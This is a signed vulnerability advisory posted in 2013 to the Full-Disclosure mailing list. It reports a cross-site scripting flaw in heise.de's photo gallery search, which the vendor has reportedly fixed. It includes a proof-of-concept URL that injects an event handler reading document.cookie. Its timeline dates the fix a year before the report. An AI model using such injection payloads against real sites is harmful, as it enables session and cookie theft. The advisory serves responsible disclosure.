[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <50EF0CBD.5040606@t-online.de>
Date: Thu, 10 Jan 2013 19:47:25 +0100
From: Stefan Schurtz <sschurtz@...nline.de>
To: full-disclosure@...ts.grok.org.uk
Subject: http://www.heise.de - Cross-site Scripting
vulnerability
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Advisory: heise.de - Cross-site Scripting vulnerability
Advisory ID: SSCHADV2013-002
Author: Stefan Schurtz
Affected Software: Successfully tested on heise.de
Vendor URL: http://www.heise.de
Vendor Status: fixed
==========================
Vulnerability Description
==========================
http://www.heise.de is prone to a XSS vulnerability
==========================
PoC-Exploit
==========================
http://www.heise.de/foto/galerie/suche/photo/?suchwort="
onMouseMove=alert(document.cookie) '
==========================
Solution
==========================
fixed
==========================
Disclosure Timeline
==========================
03-Jan-2013 - informed heise Security
04-Jan-2012 - fixed by developer
==========================
Credits
==========================
Vulnerability found and advisory written by Stefan Schurtz.
==========================
References
==========================
http://www.darksecurity.de/advisories/2013/SSCHADV2013-002.tx
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (MingW32)
Comment: Thunderbird-Portable 3.1.20 by GnuPT - Gnu Privacy Tools
Comment: Download at: http://thunderbird.gnupt.de
iEYEARECAAYFAlDvDLoACgkQg3svV2LcbMDbqgCfTc5ncA0O7zWRT3jOronFOPxC
Gr4An2tcntS/f/j14F5POgHPNBpxvC13
=hyEA
-----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists